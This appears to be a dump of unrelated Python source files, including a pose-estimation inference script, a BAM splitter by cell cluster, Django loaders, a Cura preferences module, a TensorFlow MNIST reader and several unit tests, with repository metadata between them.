import os
import torch
import pickle
import numpy as np
from lib import inteutil
from lib import posematcher
from lib.models import networkinte
from tqdm import tqdm
from TorchSUL import Model as M
from collections import defaultdict
if __name__=='__main__':
## step 1: match the poses
print('Matching poses from two branches...')
matcher = posematcher.PoseMatcher(top_down_path='./mupots/pred/',
btm_up_path='./mupots/MUPOTS_Preds_btmup_transformed.pkl')
matcher.match(pts_out_path='./mupots/pred_bu/', dep_out_path='./mupots/pred_dep_bu/',
gt_dep_path='./mupots/depths/')
## step 2: infer the integrated results
print('Inferring the integrated poses...')
# create data loader
data = inteutil.InteDataset(bu_path='./mupots/pred_bu/', bu_dep_path='./mupots/pred_dep_bu/',
td_path='./mupots/pred/', td_dep_path='./mupots/pred_dep/')
# initialize the network
net = networkinte.IntegrationNet()
pts_dumb = torch.zeros(2, 102)
dep_dumb = torch.zeros(2, 2)
net(pts_dumb, dep_dumb)
M.Saver(net).restore('./ckpts/model_inte/')
net.cuda()
# create paths
if not os.path.exists('./mupots/pred_inte/'):
os.makedirs('./mupots/pred_inte/')
if not os.path.exists('./mupots/pred_dep_inte/'):
os.makedirs('./mupots/pred_dep_inte/')
with torch.no_grad():
all_pts = defaultdict(list)
for src_pts,src_dep,vid_inst in tqdm(data):
src_pts = torch.from_numpy(src_pts).cuda()
src_dep = torch.from_numpy(src_dep).cuda()
res_pts, res_dep = net(src_pts, src_dep)
res_pts = res_pts.cpu().numpy()
res_dep = res_dep.squeeze().cpu().numpy() * 1000 # the depth is scaled 1000
# save results
i,j = vid_inst
all_pts[i].insert(j, res_pts)
pickle.dump(res_dep, open('./mupots/pred_dep_inte/%02d_%02d.pkl'%(i,j), 'wb'))
for k in all_pts:
result = np.stack(all_pts[k], axis=1)
pickle.dump(result, open('./mupots/pred_inte/%d.pkl'%(k+1), 'wb'))
| 2.140625
| 2
|
python/split_scATAC_bam_by_cluster.py
|
crazyhottommy/scATACtools
| 4
|
12775608
|
<gh_stars>1-10
#! /usr/bin/env python3
import pysam
import csv
import argparse
import os.path
import sys
parser = argparse.ArgumentParser()
parser.add_argument("csv", help="Required. the FULL path to the cluster csv file with header, \
first column is the cell barcode, second column is the cluster id")
parser.add_argument("bam", help="Required. the FULL path to the 10x scATAC bam file generated \
by cellranger-atac count")
parser.add_argument("-prefix", help="Optional, the prefix of the output bam, default is cluster_id.bam")
parser.add_argument("-outdir", help="Optional, the output directory for the splitted bams, default is current dir")
args = parser.parse_args()
if os.path.exists(args.csv):
pass
else:
print("csv file is not found")
sys.exit(1)
if os.path.exists(args.bam):
pass
else:
print("10x scATAC bam not found")
sys.exit(1)
if args.outdir:
if os.path.isdir(args.outdir):
pass
else:
try:
os.mkdir(args.outdir)
except OSError:
print("can not create directory {}".format(args.outdir))
cluster_dict = {}
with open(args.csv) as csv_file:
csv_reader = csv.reader(csv_file, delimiter=',')
#skip header
header = next(csv_reader)
for row in csv_reader:
cluster_dict[row[0]] = row[1]
clusters = set(x for x in cluster_dict.values())
fin = pysam.AlignmentFile(args.bam, "rb")
# open the number of bam files as the same number of clusters, and map the out file handler to the cluster id, write to a bam with wb
fouts_dict = {}
for cluster in clusters:
if args.prefix:
fout_name = args.prefix + "_cluster_" + cluster + ".bam"
else:
fout_name = "cluster_" + cluster + ".bam"
if args.outdir:
fout = pysam.AlignmentFile(os.path.join(args.outdir,fout_name), "wb", template = fin)
else:
fout = pysam.AlignmentFile(fout_name, "wb", template = fin)
fouts_dict[cluster] = fout
for read in fin:
tags = read.tags
# the 8th item is the CB tag
CB_list = [ x for x in tags if x[0] == "CB"]
if CB_list:
cell_barcode = CB_list[0][1]
else:
continue
# the bam files may contain reads not in the final clustered barcodes
# will be None if the barcode is not in the clusters.csv file
cluster_id = cluster_dict.get(cell_barcode)
if cluster_id:
fouts_dict[cluster_id].write(read)
## do not forget to close the files
fin.close()
for fout in fouts_dict.values():
fout.close()
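# Example invocation (file names are hypothetical):
# python split_scATAC_bam_by_cluster.py clusters.csv possorted_bam.bam -prefix sample1 -outdir split_bams
# clusters.csv holds "barcode,cluster_id" rows after a header, e.g. "AAACGAAAGCGCAATG-1,3"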
| 2.78125
| 3
|
test/testattributenames.py
|
mvz/vb2py
| 2
|
12775609
|
<gh_stars>1-10
#
# Turn off logging in extensions (too loud!)
import vb2py.extensions
import unittest
vb2py.extensions.disableLogging()
import vb2py.vbparser
vb2py.vbparser.log.setLevel(0) # Don't print all logging stuff
from vb2py.plugins.attributenames import TranslateAttributes
class TestAttributeNames(unittest.TestCase):
def setUp(self):
"""Setup the tests"""
self.p = TranslateAttributes()
# << Tests >>
def testAll(self):
"""Do some tests on the attribute"""
names =(("Text", "text"),
("Visible", "visible"),)
for attribute, replaced in names:
for pattern in ("a.%s=b", ".%s=b", "b=a.%s", "b=.%s",
"a.%s.b=c", ".%s.c=b", "b=a.%s.c", "b=.%s.c",
"a.%s.b+10=c", ".%s.c+10=b", "b=a.%s.c+10", "b=.%s.c+10",):
test = pattern % attribute
new = self.p.postProcessPythonText(test)
self.assertEqual(new, pattern % replaced)
for attribute, replaced in names:
for pattern in ("a.%slkjlk=b", ".%slkjlk=b", "b=a.%slkjl", "b=.%slkjl",
"a.%slkj.b=c", ".%slkj.c=b", "b=a.%slkj.c", "b=.%slkj.c",
"a.%slkj.b+10=c", ".%slkj.c+10=b", "b=a.%slkj.c+10", "b=.%slkj.c+10",):
test = pattern % attribute
new = self.p.postProcessPythonText(test)
self.assertNotEqual(new, pattern % replaced)
# -- end -- << Tests >>
if __name__ == "__main__":
unittest.main()
| 2.171875
| 2
|
menus/admin.py
|
sgr-smile2015/website
| 1
|
12775610
|
from django.contrib import admin
from .models import ResItem
admin.site.register(ResItem)
| 1.234375
| 1
|
tests/__init__.py
|
luisparravicini/ioapi
| 0
|
12775611
|
import os
import sys
sys.path.append(os.path.join(os.getcwd(), '..'))
| 1.648438
| 2
|
p053e/max_subarray.py
|
l33tdaima/l33tdaima
| 1
|
12775612
|
from typing import List
class Solution:
def maxSubArray(self, nums: List[int]) -> int:
ans, dp = nums[0], 0
for n in nums:
dp = max(dp + n, n)
ans = max(ans, dp)
return ans
# TESTS
tests = [
([-1], -1),
([-2, 1, -3], 1),
([-2, -1, -3], -1),
([-2, 1, -3, 4], 4),
([-2, 1, -3, 4, -1, 2, 1, -5, 4], 6),
]
for t in tests:
sol = Solution()
act = sol.maxSubArray(t[0])
print("Largest sum of subarray in", t, "->", act)
assert act == t[1]
| 3.5
| 4
|
secao4_TiposVariaveis/TipoBooleano.py
|
PauloFTeixeira/curso_python
| 0
|
12775613
|
<reponame>PauloFTeixeira/curso_python<filename>secao4_TiposVariaveis/TipoBooleano.py
"""
There are two boolean constants: True and False
True: true
False: false
NOTE: They always start with a capital letter
BASIC OPERATIONS
# NEGATION (not): if the value is true it becomes false, and if false it becomes true. ALWAYS THE OPPOSITE
Ex.: usr = True
     print(not usr) -> False
# (or): Binary operation on two values; AT LEAST ONE OF THEM MUST BE TRUE
Ex.: True or True -> True
     True or False -> True
     False or True -> True
     False or False -> False
# (and): Binary operation on two values; BOTH MUST BE TRUE
Ex.: True and True -> True
     True and False -> False
     False and True -> False
     False and False -> False
"""
| 2.703125
| 3
|
mediafeed/databases/utils.py
|
media-feed/mediafeed
| 0
|
12775614
|
<reponame>media-feed/mediafeed
from logging import getLogger
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker
from ..settings import DATABASE_URL
logger = getLogger('mediafeed.databases')
Base = declarative_base()
engine = create_engine(DATABASE_URL)
Session = sessionmaker(bind=engine)
def initdb():
    logger.info('Creating database')
Base.metadata.create_all(engine, checkfirst=True)
| 2.078125
| 2
|
src/bioregistry/external/prefixcommons.py
|
Adafede/bioregistry
| 17
|
12775615
|
<reponame>Adafede/bioregistry
# -*- coding: utf-8 -*-
"""Download registry information from the Life Science Registry (LSR), which powers Prefix Commons.
.. seealso::
- http://tinyurl.com/lsregistry which should expand to
https://docs.google.com/spreadsheets/d/1cDGJcRteb9F5-jbw7Q7np0kk4hfWhdBHNYRIg3LXDrs/edit#gid=0
"""
import json
from typing import Any, Dict
from pystow.utils import download
from bioregistry.constants import EXTERNAL
__all__ = [
"get_prefixcommons",
]
DIRECTORY = EXTERNAL / "prefixcommons"
DIRECTORY.mkdir(exist_ok=True, parents=True)
RAW_PATH = DIRECTORY / "raw.tsv"
PROCESSED_PATH = DIRECTORY / "processed.json"
GOOGLE_DOCUMENT_ID = "1c4DmQqTGS4ZvJU_Oq2MFnLk-3UUND6pWhuMoP8jgZhg"
URL = f"https://docs.google.com/spreadsheets/d/{GOOGLE_DOCUMENT_ID}/export?format=tsv&gid=0"
COLUMNS = [
"prefix", # "Preferred Prefix",
"Alt-prefix",
"Provider Base URI",
"Alternative Base URI",
"MIRIAM",
"BiodbcoreID",
"bioportal", # "BioPortal Ontology ID",
"miriam", # "identifiers.org",
"Abbreviation",
"name", # originally: Title,
"description", # "Description",
"pubmed_ids", # "PubMed ID"
"Organization",
"Type (warehouse, dataset or terminology)",
"keywords",
"homepage", # "Homepage",
"Functional?",
"sub-namespace in dataset",
"part of collection",
"License URL",
"License Text",
"Rights",
"pattern", # "ID regex",
"example", # "ExampleID",
"uri_format", # "Provider HTML URL",
"",
"MIRIAM checked",
"MIRIAM curator notes",
"MIRIAM coverage",
"updates",
"year last accessible",
"wayback url",
"last updated",
"last updated by",
"last updated by (orcid)",
]
KEEP = {
"prefix",
"bioportal",
"miriam",
"name",
"description",
"pubmed_ids",
"keywords",
"homepage",
"pattern",
"example",
"uri_format",
}
def get_prefixcommons(force_download: bool = False):
"""Get the Life Science Registry."""
if PROCESSED_PATH.exists() and not force_download:
with PROCESSED_PATH.open() as file:
return json.load(file)
download(url=URL, path=RAW_PATH, force=True)
rows = {}
with RAW_PATH.open() as file:
lines = iter(file)
next(lines) # throw away header
for line in lines:
prefix, data = _process_row(line)
if prefix and data:
rows[prefix] = data
PROCESSED_PATH.write_text(json.dumps(rows, sort_keys=True, indent=2))
return rows
def _process_row(line: str):
cells = line.strip().split("\t")
cells_processed = [None if cell in {"N/A"} else cell for cell in cells]
rv: Dict[str, Any] = {
key: value.strip()
for key, value in zip(COLUMNS, cells_processed)
if key and value and key in KEEP
}
for key in ["name", "description", "example", "pattern"]:
if not rv.get(key):
return None, None
for key in ["keywords", "pubmed_ids"]:
values = rv.get(key)
if values:
rv[key] = [value.strip() for value in values.split(",")]
uri_format = rv.get("uri_format")
if uri_format:
rv["uri_format"] = uri_format.replace("$id", "$1")
pattern = rv.get("pattern")
if pattern:
if not pattern.startswith("^"):
pattern = f"^{pattern}"
if not pattern.endswith("$"):
pattern = f"{pattern}$"
rv["pattern"] = pattern
return cells[0], rv
if __name__ == "__main__":
print(len(get_prefixcommons(force_download=True))) # noqa:T201
| 1.804688
| 2
|
tcapy_examples/gen/mongo_aws_examples.py
|
Ahrvo-Trading-Systems/tcapy
| 189
|
12775616
|
<reponame>Ahrvo-Trading-Systems/tcapy
"""This shows how we can connect to an instance of MongoDB Atlas to read/write market tick data
Note that you will need a MongoDB Atlas cloud account and must change the connection string below for it to work
"""
__author__ = 'saeedamen' # <NAME> / <EMAIL>
#
# Copyright 2020 Cuemacro Ltd. - http//www.cuemacro.com / @cuemacro
#
# See the License for the specific language governing permissions and limitations under the License.
#
import datetime
import time
from tcapy.util.loggermanager import LoggerManager
from tcapy.conf.constants import Constants
from tcapy.data.datafactory import MarketRequest
from tcapy.data.databasesource import DatabaseSourceArctic
from tcapy.util.mediator import Mediator
from tcapy.util.customexceptions import *
from test.config import *
logger = LoggerManager().getLogger(__name__)
constants = Constants()
logger.info('Make sure you have created folder ' + constants.csv_folder + ' & ' + constants.temp_data_folder +
' otherwise tests will fail')
Mediator.get_volatile_cache().clear_cache()
########################################################################################################################
# YOU MAY NEED TO CHANGE THESE
start_date = '26 Apr 2017'
finish_date = '05 Jun 2017'
ticker = 'EURUSD'
# Market data parameters for tables/databases
test_harness_arctic_market_data_table = 'market_data_table_test_harness'
test_harness_arctic_market_data_store = 'arctic-testharness'
csv_market_data_store = resource('small_test_market_df.parquet')
csv_reverse_market_data_store = resource('small_test_market_df_reverse.parquet')
# Note, you'll need to get your own connection string!
# You can setup your own MongoDB instance on the cloud using MongoDB Atlas https://www.mongodb.com/cloud/atlas
# It will give you the connection string to use
arctic_connection_string = "mongodb+srv://<username>:<password>@cluster0.blah-blah.mongodb.net/?retryWrites=true&w=majority"
def write_mongo_db_atlas_arctic():
"""Tests we can write market data to Arctic/MongoDB on Atlas (cloud)
"""
market_loader = Mediator.get_tca_market_trade_loader(version=tcapy_version)
### Test we can read data from CSV and dump to Arctic (and when read back it matches CSV)
db_start_date = '01 Jan 2016';
db_finish_date = pd.Timestamp(datetime.datetime.utcnow())
database_source = DatabaseSourceArctic(postfix='testharness', arctic_lib_type='CHUNK_STORE', connection_string=arctic_connection_string)
# Write CSV to Arctic
database_source.convert_csv_to_table(csv_market_data_store, ticker,
test_harness_arctic_market_data_table,
if_exists_table='replace', if_exists_ticker='replace', market_trade_data='market',
remove_duplicates=False)
# Read back data from Arctic and compare with CSV
market_request = MarketRequest(start_date=db_start_date, finish_date=db_finish_date, ticker=ticker,
data_store=database_source, # test_harness_arctic_market_data_store,
market_data_database_table=test_harness_arctic_market_data_table)
market_df_load = market_loader.get_market_data(market_request=market_request)
print(market_df_load)
if __name__ == '__main__':
start = time.time()
write_mongo_db_atlas_arctic()
finish = time.time()
print('Status: calculated ' + str(round(finish - start, 3)) + "s")
| 1.984375
| 2
|
Cura/Uranium/UM/Preferences.py
|
TIAO-JI-FU/3d-printing-with-moveo-1
| 0
|
12775617
|
<filename>Cura/Uranium/UM/Preferences.py
# Copyright (c) 2018 <NAME>.
# Uranium is released under the terms of the LGPLv3 or higher.
import configparser
from typing import Any, Dict, IO, Optional, Tuple, Union
from UM.Logger import Logger
from UM.MimeTypeDatabase import MimeTypeDatabase, MimeType #To register the MIME type of the preference file.
from UM.SaveFile import SaveFile
from UM.Signal import Signal, signalemitter
MimeTypeDatabase.addMimeType(
MimeType(
name = "application/x-uranium-preferences",
comment = "Uranium Preferences File",
suffixes = ["cfg"],
preferred_suffix = "cfg"
)
)
## Preferences are application based settings that are saved for future use.
# Typical preferences would be window size, standard machine, etc.
# The application preferences can be gotten from the getPreferences() function in Application
@signalemitter
class Preferences:
Version = 6
def __init__(self) -> None:
super().__init__()
self._parser = None # type: Optional[configparser.ConfigParser]
self._preferences = {} # type: Dict[str, Dict[str, _Preference]]
    ## Add a new preference to the list. If the preference was already added, its default is set to whatever is provided
def addPreference(self, key: str, default_value: Any) -> None:
if key.count("/") != 1:
raise Exception("Preferences must be in the [CATEGORY]/[KEY] format")
preference = self._findPreference(key)
if preference:
self.setDefault(key, default_value)
return
group, key = self._splitKey(key)
if group not in self._preferences:
self._preferences[group] = {}
self._preferences[group][key] = _Preference(key, default_value)
def removePreference(self, key: str) -> None:
preference = self._findPreference(key)
if preference is None:
Logger.log("i", "Preferences '%s' doesn't exist, nothing to remove.", key)
return
group, key = self._splitKey(key)
del self._preferences[group][key]
Logger.log("i", "Preferences '%s' removed.", key)
## Changes the default value of a preference.
#
# If the preference is currently set to the old default, the value of the
# preference will be set to the new default.
#
# \param key The key of the preference to set the default of.
# \param default_value The new default value of the preference.
def setDefault(self, key: str, default_value: Any) -> None:
preference = self._findPreference(key)
if not preference: # Key not found.
Logger.log("w", "Tried to set the default value of non-existing setting %s.", key)
return
if preference.getValue() == preference.getDefault():
self.setValue(key, default_value)
preference.setDefault(default_value)
def setValue(self, key: str, value: Any) -> None:
preference = self._findPreference(key)
if preference:
if preference.getValue() != value:
preference.setValue(value)
self.preferenceChanged.emit(key)
else:
Logger.log("w", "Tried to set the value of non-existing setting %s.", key)
def getValue(self, key: str) -> Any:
preference = self._findPreference(key)
if preference:
value = preference.getValue()
if value == "True":
value = True
elif value == "False":
value = False
return value
Logger.log("w", "Tried to get the value of non-existing setting %s.", key)
return None
def resetPreference(self, key: str) -> None:
preference = self._findPreference(key)
if preference:
if preference.getValue() != preference.getDefault():
preference.setValue(preference.getDefault())
self.preferenceChanged.emit(key)
else:
Logger.log("w", "Tried to reset unknown setting %s", key)
def readFromFile(self, file: Union[str, IO[str]]) -> None:
self._loadFile(file)
self.__initializeSettings()
def __initializeSettings(self) -> None:
if self._parser is None:
Logger.log("w", "Read the preferences file before initializing settings!")
return
for group, group_entries in self._parser.items():
if group == "DEFAULT":
continue
if group not in self._preferences:
self._preferences[group] = {}
for key, value in group_entries.items():
if key not in self._preferences[group]:
self._preferences[group][key] = _Preference(key)
self._preferences[group][key].setValue(value)
self.preferenceChanged.emit("{0}/{1}".format(group, key))
def writeToFile(self, file: Union[str, IO[str]]) -> None:
parser = configparser.ConfigParser(interpolation = None) #pylint: disable=bad-whitespace
for group, group_entries in self._preferences.items():
parser[group] = {}
for key, pref in group_entries.items():
if pref.getValue() != pref.getDefault():
parser[group][key] = str(pref.getValue())
parser["general"]["version"] = str(Preferences.Version)
try:
if hasattr(file, "read"): # If it already is a stream like object, write right away
parser.write(file) #type: ignore #Can't convince MyPy that it really is an IO object now.
else:
with SaveFile(file, "wt") as save_file:
parser.write(save_file)
except Exception as e:
Logger.log("e", "Failed to write preferences to %s: %s", file, str(e))
preferenceChanged = Signal()
def _splitKey(self, key: str) -> Tuple[str, str]:
group = "general"
key = key
if "/" in key:
parts = key.split("/")
group = parts[0]
key = parts[1]
return group, key
def _findPreference(self, key: str) -> Optional[Any]:
group, key = self._splitKey(key)
if group in self._preferences:
if key in self._preferences[group]:
return self._preferences[group][key]
return None
def _loadFile(self, file: Union[str, IO[str]]) -> None:
try:
self._parser = configparser.ConfigParser(interpolation = None) #pylint: disable=bad-whitespace
if hasattr(file, "read"):
self._parser.read_file(file)
else:
self._parser.read(file, encoding = "utf-8")
if self._parser["general"]["version"] != str(Preferences.Version):
Logger.log("w", "Old config file found, ignoring")
self._parser = None
return
except Exception:
Logger.logException("e", "An exception occurred while trying to read preferences file")
self._parser = None
return
del self._parser["general"]["version"]
## Extract data from string and store it in the Configuration parser.
def deserialize(self, serialized: str) -> None:
updated_preferences = self.__updateSerialized(serialized)
self._parser = configparser.ConfigParser(interpolation = None)
try:
self._parser.read_string(updated_preferences)
except configparser.MissingSectionHeaderError:
Logger.log("w", "Could not deserialize preferences from loaded project")
self._parser = None
return
has_version = "general" in self._parser and "version" in self._parser["general"]
if has_version:
if self._parser["general"]["version"] != str(Preferences.Version):
Logger.log("w", "Could not deserialize preferences from loaded project")
self._parser = None
return
else:
return
self.__initializeSettings()
## Updates the given serialized data to the latest version.
def __updateSerialized(self, serialized: str) -> str:
configuration_type = "preferences"
try:
from UM.VersionUpgradeManager import VersionUpgradeManager
version = VersionUpgradeManager.getInstance().getFileVersion(configuration_type, serialized)
if version is not None:
result = VersionUpgradeManager.getInstance().updateFilesData(configuration_type, version, [serialized], [""])
if result is not None:
serialized = result.files_data[0]
except:
Logger.logException("d", "An exception occurred while trying to update the preferences.")
return serialized
class _Preference:
def __init__(self, name: str, default: Any = None, value: Any = None) -> None:
self._name = name
self._default = default
self._value = default if value is None else value
def getName(self) -> str:
return self._name
def getValue(self) -> Any:
return self._value
def getDefault(self) -> Any:
return self._default
def setDefault(self, default: Any) -> None:
self._default = default
def setValue(self, value: Any) -> None:
self._value = value
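# Illustrative usage sketch (the preference key is hypothetical):
# preferences = Preferences()
# preferences.addPreference("general/language", default_value="en_US")
# preferences.setValue("general/language", "nl_NL")
# assert preferences.getValue("general/language") == "nl_NL"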
| 2.171875
| 2
|
classic/cem.py
|
podondra/roboschool-rl
| 2
|
12775618
|
<reponame>podondra/roboschool-rl
# inspired by
# http://rl-gym-doc.s3-website-us-west-2.amazonaws.com/mlss/lab1.html
import numpy
class LinearPolicy:
def __init__(self, theta, env):
obs_dim = env.observation_space.shape[0]
act_dim = env.action_space.n
self.W = theta[:obs_dim * act_dim].reshape(obs_dim, act_dim)
self.b = theta[obs_dim * act_dim:]
def act(self, observation):
y = numpy.dot(observation, self.W) + self.b
return y.argmax()
def run_episode(policy, env, n_timesteps, render=False):
total_reward = 0
S = env.reset()
for t in range(n_timesteps):
a = policy.act(S)
S, R, done, _ = env.step(a)
total_reward += R
if render:
env.render()
if done:
break
return total_reward
def noisy_evaluation(theta, env, n_timesteps):
policy = LinearPolicy(theta, env)
return run_episode(policy, env, n_timesteps)
def cross_entropy_method(
env, n_iteration, n_timesteps, batch_size=25, elite=0.2, render=True
):
theta_dim = (env.observation_space.shape[0] + 1) * env.action_space.n
theta_mean = numpy.zeros(theta_dim)
theta_std = numpy.ones(theta_dim)
n_elite = int(batch_size * elite)
for iteration in range(n_iteration):
# sample parameter vectors
thetas = numpy.random.normal(
loc=theta_mean,
scale=theta_std,
size=(batch_size, theta_dim)
)
rewards = numpy.zeros(batch_size)
for i, theta in enumerate(thetas):
rewards[i] = noisy_evaluation(theta, env, n_timesteps)
# get elite parameters
elite_idxs = numpy.argsort(rewards)[-n_elite:]
elite_thetas = thetas[elite_idxs]
theta_mean = elite_thetas.mean(axis=0)
theta_std = elite_thetas.std(axis=0)
print('iteration:{:9d} mean reward: {:f} max reward: {:f}'.format(
iteration, numpy.mean(rewards), numpy.max(rewards)
))
policy = LinearPolicy(theta_mean, env)
run_episode(policy, env, n_timesteps, render)
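# Usage sketch (assumes the `gym` package and a discrete-action environment, neither of
# which is imported by this module):
# import gym
# env = gym.make('CartPole-v1')
# cross_entropy_method(env, n_iteration=20, n_timesteps=200, render=False)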
| 2.65625
| 3
|
dataset_learn_slim.py
|
zhongdixiu/tensorflow-learn
| 0
|
12775619
|
# coding=utf-8
"""Use MNIST as an example of reading data with slim.data.
"""
import os
import tensorflow as tf
slim = tf.contrib.slim
def get_data(data_dir, num_samples, num_class, file_pattern='*.tfrecord'):
    """Return a slim.dataset.Dataset for the MNIST tfrecords.
    :param data_dir: directory that holds the tfrecord files
    :param num_samples: number of samples
    :param num_class: number of classes
    :param file_pattern: tfrecord file name pattern
    :return:
    """
file_pattern = os.path.join(data_dir, file_pattern)
keys_to_features = {
"image/encoded": tf.FixedLenFeature((), tf.string, default_value=""),
"image/format": tf.FixedLenFeature((), tf.string, default_value="raw"),
'image/height': tf.FixedLenFeature((), tf.int64, default_value=tf.zeros([], dtype=tf.int64)),
'image/width': tf.FixedLenFeature((), tf.int64, default_value=tf.zeros([], dtype=tf.int64)),
"image/class/label": tf.FixedLenFeature((), tf.int64, default_value=tf.zeros([], dtype=tf.int64))
}
items_to_handlers = {
"image": slim.tfexample_decoder.Image(channels=1),
"label": slim.tfexample_decoder.Tensor("image/class/label")
}
decoder = slim.tfexample_decoder.TFExampleDecoder(keys_to_features, items_to_handlers)
    items_to_descriptions = {
        "image": 'A grayscale handwritten-digit image',
        "label": 'A single integer between 0 and ' + str(num_class - 1)
}
return slim.dataset.Dataset(
data_sources=file_pattern,
reader=tf.TFRecordReader,
decoder=decoder,
num_samples=num_samples,
items_to_descriptions=items_to_descriptions,
num_classes=num_class,
label_to_names=label_to_name
)
NUM_EPOCH = 2
BATCH_SIZE = 8
NUM_CLASS = 10
NUM_SAMPLE = 60000
label_to_name = {'0': 'zero', '1': 'one', '2': 'two', '3': 'three', '4': 'four',
                 '5': 'five', '6': 'six', '7': 'seven', '8': 'eight', '9': 'nine'}
data_dir = './'
dataset = get_data(data_dir, NUM_SAMPLE, NUM_CLASS, 'mnist_train.tfrecord')
data_provider = slim.dataset_data_provider.DatasetDataProvider(dataset)
[image, label] = data_provider.get(['image', 'label'])
# Batch the data
images, labels = tf.train.batch([image, label], batch_size=BATCH_SIZE)
labels = slim.one_hot_encoding(labels, NUM_CLASS)
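# Consumption sketch (assumes a classic TF1 queue-runner session loop):
# with tf.Session() as sess:
#     sess.run([tf.global_variables_initializer(), tf.local_variables_initializer()])
#     coord = tf.train.Coordinator()
#     threads = tf.train.start_queue_runners(sess=sess, coord=coord)
#     image_batch, label_batch = sess.run([images, labels])
#     coord.request_stop()
#     coord.join(threads)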
| 2.6875
| 3
|
exercicios/05.py
|
paulo123araujo/minicurso-python
| 0
|
12775620
|
<gh_stars>0
def calcula_fatorial(n):
    """Return n! computed iteratively."""
    resultado = 1
    for i in range(1, n+1):
        resultado = resultado * i
    return resultado
def imprime_numeros(n):
    """Return the string "n . n-1 . ... . 1" used to display the expansion."""
    imprimir = ""
    for i in range(n, 0, -1):
        imprimir += "%d . " % (i)
    return imprimir[:len(imprimir) - 3]
numero = int(input("Digite um numero: "))
print("Fatorial de: %d" %(numero))
imprime = imprime_numeros(numero)
fatorial = calcula_fatorial(numero)
print("%d! = %s = %d" %(numero, imprime, fatorial))
| 4.0625
| 4
|
distributions/management/commands/load_section_data.py
|
cvivesa/class_util
| 1
|
12775621
|
<reponame>cvivesa/class_util<gh_stars>1-10
from pathlib import Path
from csv import DictReader
from django.core.management import BaseCommand
from distributions.models import Term, Course, Section
ALREADY_LOADED_ERROR_MESSAGE = """
If you need to reload the section data from the CSV file,
first delete the db.sqlite3 file to destroy the database.
Then, run `python manage.py migrate` for a new empty
database with tables\n"""
INVALID_CSV_NAME_ERROR_MESSAGE = """
CSVs must be in the format [fall/spring]YYYY.csv
eg: fall 2018 would be fall2018.csv
non-fall/spring semesters are not supported at this time\n"""
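# Typical invocation (illustrative, inferred from the command's location under
# distributions/management/commands/): python manage.py load_section_data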
class Command(BaseCommand):
help = "Loads data from distributions/data/*.csv into the Sections model"
def handle(self, *args, **options):
if Section.objects.exists():
print('Section data already loaded...exiting.')
print(ALREADY_LOADED_ERROR_MESSAGE)
return
duplicates = 0
print("Loading section data...\n")
for path in Path('distributions/data').iterdir():
path_str = str(path).lower()
if path_str[-4:] != '.csv':
continue
filename = path.parts[-1].split('.')[0]
semester = filename[:-4]
year = filename[-4:]
if semester not in ['fall', 'spring']:
print('invalid semester in csv: ' + path_str)
print(INVALID_CSV_NAME_ERROR_MESSAGE)
continue
if year.isdigit():
year = int(year)
else:
print('invalid year in csv: ' + path_str)
print(INVALID_CSV_NAME_ERROR_MESSAGE)
continue
term = Term()
term.semester = semester
term.year = year
term.save()
table = []
with open(path, encoding='utf-8-sig') as file:
for row in DictReader(file):
table.append(row)
for row in table:
section = Section()
section.term = term
section.course, created = Course.objects.get_or_create(
department = row['department'],
number = row['course_number_1'],
title = row['course_title'],
hours = row['credit_hours'])
section.CRN = row['course_ei']
section.instructor = row['faculty']
section.average_GPA = row['qca']
section.As = row['As']
section.Bs = row['Bs']
section.Cs = row['Cs']
section.Ds = row['Ds']
section.Fs = row['Fs']
section.withdrawals = row['Textbox10']
section.class_size = row['number']
section.save()
print('done')
| 2.65625
| 3
|
tests/test_format_fixer.py
|
Sung-Huan/ANNOgesic
| 26
|
12775622
|
#!/usr/bin/python
import os
import sys
import csv
import shutil
from io import StringIO
import unittest
sys.path.append(".")
from mock_helper import import_data
from annogesiclib.format_fixer import FormatFixer
class TestFormatFixer(unittest.TestCase):
def setUp(self):
self.fixer = FormatFixer()
self.example = Example()
self.ratt_out = self.example.ratt_out
self.rnaplex_out = self.example.rnaplex_out
self.emboss_out = self.example.emboss_out
self.test_folder = "test_folder"
if (not os.path.exists(self.test_folder)):
os.mkdir(self.test_folder)
self.ratt_file = os.path.join(self.test_folder, "ratt.gff")
with open(self.ratt_file, "w") as rh:
rh.write(self.example.ratt_gff)
self.rnaplex_file = os.path.join(self.test_folder, "rnaplex.txt")
with open(self.rnaplex_file, "w") as rh:
rh.write(self.example.rnaplex_file)
self.emboss_file = os.path.join(self.test_folder, "emboss.txt")
with open(self.emboss_file, "w") as rh:
rh.write(self.example.emboss_file)
def tearDown(self):
if os.path.exists(self.test_folder):
shutil.rmtree(self.test_folder)
def test_fix_ratt(self):
out = os.path.join(self.test_folder, "ratt.out")
self.fixer.fix_ratt(self.ratt_file, "Staphylococcus_aureus_HG003", out)
datas = import_data(out)
self.assertEqual(set(datas), set(self.ratt_out.split("\n")))
def test_fix_rnaplex(self):
out_file = os.path.join(self.test_folder, "rnaplex.out")
self.fixer.fix_rnaplex(self.rnaplex_file, out_file)
datas = import_data(out_file)
self.assertEqual(set(datas), set(self.rnaplex_out.split("\n")))
def test_fix_emboss(self):
out_file = os.path.join(self.test_folder, "emboss.out")
self.fixer.fix_emboss(self.emboss_file, out_file)
datas = import_data(out_file)
self.assertEqual(set(datas), set(self.emboss_out.split("\n")))
class Example(object):
ratt_gff = """##gff-version 3
chromosome.Staphylococcus_aureus_HG003.final Refseq source 1 2821337 . + . mol_type=genomic DNA;db_xref=taxon:93061;strain=NCTC 8325;organism=Staphylococcus aureus subsp. aureus NCTC 8325;sub_species=aureus
chromosome.Staphylococcus_aureus_HG003.final Refseq gene 517 1878 . + . gene=dnaA;db_xref=GeneID:3919798;locus_tag=SAOUHSC_00001
chromosome.Staphylococcus_aureus_HG003.final Refseq CDS 517 1878 . + . gene=dnaA;db_xref=GI:88193824;db_xref=GeneID:3919798;transl_table=11;product=chromosomal replication initiation protein;note=binds to the dnaA-box as an ATP-bound complex at the origin of replication during the initiation of chromosomal replication, can also affect transcription of multiple genes including itself.;locus_tag=SAOUHSC_00001;protein_id=REF_uohsc:SAOUHSC00001;protein_id=YP_498609.1;codon_start=1
chromosome.Staphylococcus_aureus_HG003.final Refseq gene 2156 3289 . + . db_xref=GeneID:3919799;locus_tag=SAOUHSC_00002
chromosome.Staphylococcus_aureus_HG003.final Refseq tRNA 2156 3289 . + . EC_number=2.7.7.7;db_xref=GI:88193825;db_xref=GeneID:3919799;transl_table=11;product=DNA polymerase III subunit beta;note=binds the polymerase to DNA and acts as a sliding clamp;locus_tag=SAOUHSC_00002;protein_id=REF_uohsc:SAOUHSC00002;protein_id=YP_498610.1;codon_start=1"""
